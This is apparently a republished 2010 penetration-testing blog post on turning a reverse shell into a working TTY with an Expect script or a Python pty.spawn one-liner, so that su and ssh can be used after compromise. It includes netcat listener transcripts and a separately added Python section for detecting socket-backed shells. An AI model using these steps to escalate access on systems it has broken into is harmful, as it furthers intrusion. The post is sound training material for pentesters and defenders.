Exploitation Without A TTY
Source: vfocus.net  Author: vfocus  Published: 2010-12-29

This is a follow-up to a topic I touched on briefly before when I talked about the problem of trying to use the SSH client when you don’t have a TTY.  I was recently in a position where I got an interactive shell on a box, discovered the root password but was unable to get root because I couldn’t run “login” or “su”.  Both of these required a TTY in order to work.

I don’t present a definitive solution to this problem (if you have one please send it in!).  However, I discuss a couple of approaches to getting a TTY…

Post-exploitation activities during a pentest may involve using “su” to try and log into other local accounts, or using “ssh” to log into other hosts.

Using “Expect” To Get A TTY

If you’re lucky enough to have the Expect language installed, just a few lines of code will get you a good enough TTY to run useful tools such as “ssh”, “su” and “login”.

$ cat sh.exp
#!/usr/bin/expect
# Spawn a shell, then allow the user to interact with it.
# The new shell will have a good enough TTY to run tools like ssh, su and login
spawn sh
interact

The following output taken from a reverse shell demonstrates how “su” doesn’t work until we use the Expect script:

$ nc -v -n -l -p 1234
listening on [any] 1234 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 48257
sh: no job control in this shell
sh-3.2$ su -
su: must be run from a terminal
sh-3.2$ expect sh.exp
spawn sh
sh-3.2$ su -
Password:  mypassword
localhost ~ #

Likewise, the ssh client doesn’t seem to work properly (with or without the -T option):

$ nc -v -n -l -p 1234
listening on [any] 1234 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 33250
sh: no job control in this shell
sh-3.2$ ssh localhost
Pseudo-terminal will not be allocated because stdin is not a terminal.
<big pause>
$ nc -v -n -l -p 1234
listening on [any] 1234 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 33252
sh: no job control in this shell
sh-3.2$ ssh -T localhost
<big pause>

After we run sh.exp we are able to use the ssh client as normal:

$ nc -v -n -l -p 1234
listening on [any] 1234 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 43498
sh: no job control in this shell
sh-3.2$ expect sh.exp
spawn sh
sh-3.2$ ssh localhost
ssh localhost
Password: mypassword
Last login: Wed Jan 16 13:43:20 2008 from 127.0.0.1

user@localhost ~ $

Using Python To Get A TTY

This is quite an elegant solution I found on Tero’s blog.  It should be effective against Gentoo systems at least, because the Gentoo package management runs on Python.

$ nc -v -n -l -p 1234
listening on [any] 1234 ...
sh: no job control in this shell
sh-3.2$ su -
su: must be run from a terminal
sh-3.2$ python -c 'import pty; pty.spawn("/bin/sh")'
sh-3.2$ su -
su -
Password:
localhost ~ #
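The reason both the Expect script and pty.spawn() work is the same: su, login and ssh test whether their standard input is a terminal, and a shell reached over a socket or pipe fails that test. The following Python script is an added illustration, not code from the original post; it assumes Python 3 on a Linux host with pty devices and /proc available. It runs a small probe child once with stdin on a pipe and once with stdin on the slave side of a freshly allocated pseudo-terminal (the same object pty.spawn() hands to the shell), and adds a small classifier a defender can point at /proc/<pid>/fd/0 to tell a shell whose stdin is a socket (the "no job control" case above) from one sitting on /dev/pts/N:

```python
import os
import pty
import subprocess
import sys

# Probe child: reports whether its own fd 0 is a terminal. su, login and ssh
# make essentially this isatty() check before refusing to run.
PROBE = [sys.executable, "-c", "import os; print(int(os.isatty(0)))"]


def _probe_says_tty(proc):
    return proc.stdout.strip() == "1"


def stdin_is_tty_via_pipe():
    """Run the probe with stdin on a pipe, the situation of a shell reached
    over nc. Returns False: a pipe (or a socket) is not a terminal."""
    proc = subprocess.run(PROBE, input="", capture_output=True, text=True)
    return _probe_says_tty(proc)


def stdin_is_tty_via_pty():
    """Run the probe with stdin on the slave end of a new pseudo-terminal,
    which is what pty.spawn() or the expect script arranges for the shell.
    Returns True, or None when the host has no pty devices (e.g. a
    restricted sandbox), so the caller can distinguish the two cases."""
    try:
        master, slave = pty.openpty()
    except OSError:
        return None
    try:
        proc = subprocess.run(PROBE, stdin=slave, stdout=subprocess.PIPE,
                              stderr=subprocess.DEVNULL, text=True)
    finally:
        os.close(master)
        os.close(slave)
    return _probe_says_tty(proc)


def classify_stdin_target(link):
    """Classify the readlink() target of /proc/<pid>/fd/0. An interactive
    shell whose stdin resolves to socket:[...] is one that arrived over the
    network; after a pty upgrade the same shell sits on /dev/pts/N."""
    if link.startswith("socket:["):
        return "socket"
    if link.startswith("pipe:["):
        return "pipe"
    if link.startswith("/dev/pts/") or link.startswith("/dev/tty"):
        return "pty"
    return "other"


def own_stdin_target():
    """Readlink of this process's own fd 0, for trying the classifier live
    (returns 'unavailable' on systems without /proc)."""
    try:
        return os.readlink("/proc/self/fd/0")
    except OSError:
        return "unavailable"


if __name__ == "__main__":
    print("pipe stdin is a tty:", stdin_is_tty_via_pipe())
    print("pty  stdin is a tty:", stdin_is_tty_via_pty())
    target = own_stdin_target()
    print("this process's stdin:", target, "->", classify_stdin_target(target))
```

Run with no arguments; the first line prints False and the second True on a normal Linux box. On the detection side, the classifier applied to the fd/0 links of running shells (for example `ls -l /proc/*/fd/0` for processes named sh or bash) gives the same signal the shell prompt gives an attacker: a socket-backed shell is the one that cannot run su, and a shell that has just moved to /dev/pts/N is one that has been upgraded.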

Using PERL To Get A TTY

This is not such a great solution, as IO::Pty isn’t installed by default on any system I’ve seen.  For completeness, though:

<hmmm… can’t get it working.  Will post later.>
